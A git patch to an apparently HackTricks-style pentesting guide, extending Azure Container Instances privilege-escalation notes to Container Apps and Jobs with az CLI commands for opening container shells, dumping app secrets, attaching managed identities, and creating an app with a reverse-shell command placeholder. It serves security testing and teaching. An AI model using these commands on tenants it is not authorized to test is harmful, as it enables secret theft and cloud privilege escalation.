From 9cd2ef8e2f597cec30923172457b79b813cbcd34 Mon Sep 17 00:00:00 2001
From: Carlos Polop <carlospolop@gmail.com>
Date: Sat, 15 Feb 2025 18:48:56 +0100
Subject: [PATCH] fixes

---
 src/SUMMARY.md                                |  4 +-
 ...z-container-instances-apps-jobs-privesc.md | 67 +++++++++++++++++--
 .../az-container-instances-apps-jobs.md       | 19 ++++--
 3 files changed, 78 insertions(+), 12 deletions(-)

diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 3cd74bd86..b6391b16a 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -415,7 +415,7 @@
     - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
     - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
     - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
-    - [Az - Container Instances](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md)
+    - [Az - Container Instances, Apps & Jobs](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md)
     - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md)
     - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md)
     - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md)
@@ -470,7 +470,7 @@
     - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
     - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
     - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)
-    - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md)
+    - [Az - Container Instances, Apps & Jobs Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md)
     - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md)
     - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
       - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
index 8f554c7c6..db1478e3f 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
@@ -1,8 +1,8 @@
-# Az - Azure Container Instances Privesc
+# Az - Azure Container Instances, Apps & Jobs Privesc
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Azure Container Instances
+## Azure Container Instances, Apps & Jobs
 
 Fore more information check:
 
@@ -10,14 +10,16 @@ Fore more information check:
 ../az-services/az-container-instances-apps-jobs.md
 {{#endref}}
 
+## ACI
+
 ### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action`
 
 These permissions allow the user to **execute a command** in a running container. This can be used to **escalate privileges** in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container.
 
-To execute a `ls` and get the output is as simple as:
+To get a shell is as simple as:
 
 ```bash
-az container exec --name <container-name> --resource-group <res-group>  --exec-command 'ls'
+az container exec --name <container-name> --resource-group <res-group>  --exec-command '/bin/sh'
 ```
 
 It's also possible to **read the output** of the container with:
@@ -71,6 +73,63 @@ az container create \
 
 Moreover, it's also possible to update an existing container group adding for example the **`--command-line` argument** with a reverse shell.
 
+
+## ACA
+
+### `Microsoft.App/containerApps/read`, `Microsoft.App/managedEnvironments/read`, `microsoft.app/containerapps/revisions/replicas`, `Microsoft.App/containerApps/revisions/read`, `Microsoft.App/containerApps/getAuthToken/action`
+
+These permissions allow the user to **get a shell** in a runningapplication container. This can be used to **escalate privileges** in the container if it has any managed identity attached. Ofc, it's also possible to access the source code and any other sentitive information storeed inside the container.
+
+```bash
+az containerapp exec --name <app-name> --resource-group <res-group> --command "sh"
+az containerapp debug --name <app-name> --resource-group <res-group>
+
+```
+
+### `Microsoft.App/containerApps/listSecrets/action`
+
+This permission allows to get the **clear text of the secrets** configured inside a container app. Note that secrets can be configured with the clear text of with a link to a key vault (in such case the app will have assigned a managed identity with access over the secrets).
+
+```bash
+az containerapp secret list --name <app-name> --resource-group <res-group>
+az containerapp secret show --name <app-name> --resource-group <res-group> --secret-name <scret-name>
+```
+
+### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
+
+These permissions allows to **attach a user managed identity** to a container app. This is very useful to escalate privileges in the container. Executing this action from the az cli also requires the permission `Microsoft.App/containerApps/listSecrets/action`.
+
+To attach a user managed identity to a container group:
+
+```bash
+az containerapp identity assign -n <app-name> -g <res-group> --user-assigned myUserIdentityName
+```
+
+### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`
+
+These permission allows to **create or update an application container** with a **user managed identity** attached to it. This is very useful to escalate privileges in the container.
+
+```bash
+# Get environments
+az containerapp env list --resource-group Resource_Group_1
+
+# Create app in a an environment
+az containerapp create \
+  --name <app-name> \
+  --resource-group <res-group> \
+  --image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
+  --cpu 1 --memory 1.0 \
+  --user-assigned <user-asigned-identity-name> \
+  --min-replicas 1 \
+  --command "<reserse shell>"
+```
+
+> [!TIP]
+> Note that with these permisions **other configurations of the app** can be modified which could allow to perform other privesc and post explaoitation attacks depending on the configuration of existing apps.
+
+
+## Jobs
+
 {{#include ../../../banners/hacktricks-training.md}}
 
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md
index ef2755ebe..4dfd453ab 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md
@@ -14,16 +14,20 @@ Differences:
 
 ### Configurations
 
-Special options for ACI:
-- Regarding networking it can also have a **public IP** or be **private endpoints**.
+Special options for **ACI**:
+- Regarding networking it's possible to select one of these 3 options:
+  - **Public** (default)
+  - **Private** (only accessible from the VNet)
+  - **None** (no network access)
 
-Special options for ACA:
+Special options for **ACA**:
 - It's possible to **restrict the trafic** to the container to the container app environment or leave it public.
 - It’s possible to use an **external identity provider** (Microsoft, Facebook, Google, and Twitter) for authentication
 - It's possible to **store App secrets** (in clear text the app or as links to a vault assigning a MI with access over it)
 - It’s possible to have **revisions and replicas of the app**
+- It's possible to deploy from a specific **source code or artifact** instead of using a container. For the source code, access to Gihub must be given. For artifacts, it's possible to upload it after creating the app.
 
-Special options for jobs:
+Special options for **jobs**:
 - The trigger type can be **manual, scheduled or event-based** (like a message arriving in a queue).
 
 Common options:
@@ -56,10 +60,10 @@ az container show --name <container-name> --resource-group <res-group>
 az container logs --name <container-name> --resource-group <res-group>
 
 ## Execute a command in a running container and get the output
-az container exec --name <container-name> --resource-group <res-group> --exec-command "ls"
+az container exec --name <container-name> --resource-group <res-group> --exec-command "/bin/sh" # Get a shell
 
 ## Get yaml configuration of the container group
-az container export  --name <container-name> --resource-group <res-group>
+az container export  --name <container-name> --resource-group <res-group> --file </path/local/file.yml>
 
 # ACA
 ## List all container apps in the subscription
@@ -68,6 +72,9 @@ az containerapp list
 ## Show detailed information about a specific container app
 az containerapp show --name <app-name> --resource-group <res-group>
 
+## List app environments
+az containerapp env list --resource-group <res-group>
+
 ## Fetch logs from a container app
 az containerapp logs show --name <app-name> --resource-group <res-group>